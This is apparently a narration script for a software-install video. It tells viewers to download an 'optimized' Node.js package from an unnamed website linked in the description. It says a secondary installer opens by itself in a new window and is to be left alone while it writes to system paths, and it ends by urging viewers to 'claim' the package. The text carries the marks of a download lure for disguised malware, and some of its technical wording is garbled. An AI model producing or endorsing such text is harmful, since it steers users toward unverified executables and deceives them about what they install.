Hi there, JavaScript was natively locked inside web browsers, preventing it from executing backend server logic directly on your machine. Today, we are deploying an optimized Node.js runtime environment to build high-performance network applications for zero cost. Let's execute the engine. Move straight down to the description notes and pull the core Node.js binary package directly from our website. Running this initial installer configures your main destination paths and copies the core execution files. Watch your monitor as a secondary Node.js package manager setup automatically triggers in a new window. Just let this sub-installer write the vital command line pathways and register the npm toolset to your system. Now, fire up your terminal interface and type the native command to see the active Node.js version prompt map itself out. Allow the system variables to initialize completely to ensure the console loads with zero lag. Your advanced Node.js runtime environment is calibrated, active, and ready to power massive web servers. Head over to our website right now to claim your installation package and start engineering like a boss.